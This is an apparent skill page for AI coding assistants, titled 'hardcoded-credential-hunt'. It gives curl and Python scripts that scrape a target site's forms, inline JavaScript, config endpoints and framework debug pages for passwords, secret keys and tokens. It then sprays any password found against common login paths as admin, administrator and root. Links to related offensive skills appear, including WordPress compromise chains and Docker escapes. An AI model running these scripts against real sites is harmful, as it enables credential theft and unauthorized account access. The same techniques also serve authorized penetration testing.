원클릭으로
hardcoded-credential-hunt
Detect hardcoded passwords in HTML forms, JavaScript, and API responses.
Codex 또는 Claude로 설치 이 Prompt를 복사해 Codex, Claude 또는 다른 어시스턴트에 붙여 넣으면 Skill 페이지를 검토하고 설치를 진행할 수 있습니다.
메뉴
Detect hardcoded passwords in HTML forms, JavaScript, and API responses.
Codex 또는 Claude로 설치 이 Prompt를 복사해 Codex, Claude 또는 다른 어시스턴트에 붙여 넣으면 Skill 페이지를 검토하고 설치를 진행할 수 있습니다.
Attack SAML SSO via XSW, signature strip, metadata extract.
Chain multiple vulns into critical impact attack paths.
Execute optimal kill chains for WordPress full compromise.
Escape Docker containers to host root via 5 techniques.
Catalog: 25 attacks, 18 WP, 8 CORS to match findings.
7-phase pentest pipeline from passive recon to exploitation.
| name | hardcoded-credential-hunt |
| description | Detect hardcoded passwords in HTML forms, JavaScript, and API responses. |
| version | 1.0.0 |
| author | uphiago |
| license | MIT |
| platforms | ["linux"] |
| compatibility | Requires curl, python3 |
| metadata | {"tags":["recon","password","credential","hardcoded","HTML","javascript","API"],"category":"recon","related_skills":["api-noauth-hunt","js-secrets-extraction","source-leak-hunt"]} |
Detect credentials baked into client-side code or HTML responses. Targets include master passwords in form value attributes, secret keys in inline scripts, API tokens in configuration endpoints, and plaintext credentials leaked through debug error pages. This class of vulnerability bypasses authentication entirely — no brute force required.
/api/config, /env, /settings) returns JSON with credential-like strings.terminal tool with curl and python3.# Scan HTML for password fields with pre-filled values
curl -sk "https://target.com/PATH" | grep -oPi '(?:password|passwd|senha|pass|pwd|secret)\s*[=:"]\s*"?[^"&\s]{4,30}"?' | head -10
# Scan JSON config endpoints for credential-like keys
curl -sk "https://target.com/api/config" | python3 -c "
import sys, json, re
try:
data = json.load(sys.stdin)
for k, v in data.items() if isinstance(data, dict) else []:
if any(x in k.lower() for x in ['pass','secret','key','token','auth']):
print(f'{k}: {v}')
except: pass
"
# Scan inline JavaScript for hardcoded secrets
curl -sk "https://target.com/" | grep -oP '(?:SECRET|PASSWORD|API_KEY|TOKEN)\s*=\s*"[^"]{8,}"' | head -10
Look for password fields with value attributes or hidden inputs containing credentials:
# Extract all password inputs
curl -sk "https://target.com/PATH" | python3 -c "
import sys, re
html = sys.stdin.read()
# Inputs with type=password and non-empty value
for m in re.finditer(r'<input[^>]*type\s*=\s*[\"\']password[\"\'][^>]*value\s*=\s*[\"\']([^\"\']+)[\"\']', html):
print(f'PASSWORD FIELD: {m.group(1)}')
# Hidden inputs that look like passwords
for m in re.finditer(r'<input[^>]*type\s*=\s*[\"\']hidden[\"\'][^>]*name\s*=\s*[\"\']([^\"\']*(?:pass|senha|secret|token|key)[^\"\']*)[\"\'][^>]*value\s*=\s*[\"\']([^\"\']+)[\"\']', html, re.IGNORECASE):
print(f'HIDDEN CREDENTIAL: {m.group(1)} = {m.group(2)}')
"
Probe common config endpoints that may leak credentials:
for path in /api/config /api/settings /env /api/env /config.json /api/config.json \
/api/v1/config /api/configuration /api/v2/settings /api/status; do
result=$(curl -sk "https://target.com$path" -w "\n%{http_code}" 2>/dev/null)
code=$(echo "$result" | tail -1)
if [ "$code" = "200" ]; then
echo "=== $path (200) ==="
echo "$result" | python3 -c "
import sys, json, re
data = sys.stdin.read()
# Try JSON
try:
obj = json.loads(data)
for k, v in obj.items() if isinstance(obj, dict) else []:
if any(x in str(k).lower() for x in ['pass','secret','key','token','auth','jwt']):
print(f' {k}: {v}')
except:
# Try regex on plain text
for m in re.finditer(r'(?:password|passwd|secret|token|api[_-]?key)\s*[=:]\s*[\"']([^\"']{4,})[\"']', data, re.I):
print(f' {m.group(0)}')
" | head -20
fi
done
Werkzeug, Django, and Express debug pages often leak secrets in inline JavaScript:
# Trigger an error and check for credential leaks
curl -sk "https://target.com:PORT/ERROR_TRIGGER_PATH" | python3 -c "
import sys, re
html = sys.stdin.read()
# Werkzeug debugger SECRET
match = re.search(r'SECRET\s*=\s*[\"]([^\"\']+)[\"]', html)
if match: print(f'WERKZEUG_SECRET: {match.group(1)}')
# Django settings
for m in re.finditer(r'SECRET_KEY\s*=\s*[\"]([^\"\']+)[\"]', html):
print(f'DJANGO_SECRET: {m.group(1)}')
# Generic credential patterns
for m in re.finditer(r'(?:PASSWORD|PASS|TOKEN|API_KEY)\s*=\s*[\"]([^\"\']{6,})[\"']", html, re.I):
print(f'LEAKED: {m.group(0)}')
"
When a hardcoded password is found, test it against all authentication endpoints:
PASSWORD="found_password"
# Test against common auth endpoints
for endpoint in /login /api/login /api/auth/login /auth /admin /api/admin; do
for user in admin administrator root; do
code=$(curl -sk -o /dev/null -w "%{http_code}" \
-d "username=$user&password=$PASSWORD" \
"https://target.com$endpoint")
if [ "$code" = "302" ] || [ "$code" = "200" ]; then
echo "SUCCESS: $user:$PASSWORD at $endpoint (HTTP $code)"
fi
done
done
password123, changeme, and empty strings before reporting — they are often development defaults.api-noauth-hunt — Exploiting API endpoints that lack authentication entirely.js-secrets-extraction — Finding API keys and tokens in JavaScript bundles.source-leak-hunt — Detecting exposed configuration files (.env, wp-config, etc.).flask-werkzeug-attack — Exploiting Werkzeug debugger SECRET leaks and traceback disclosure.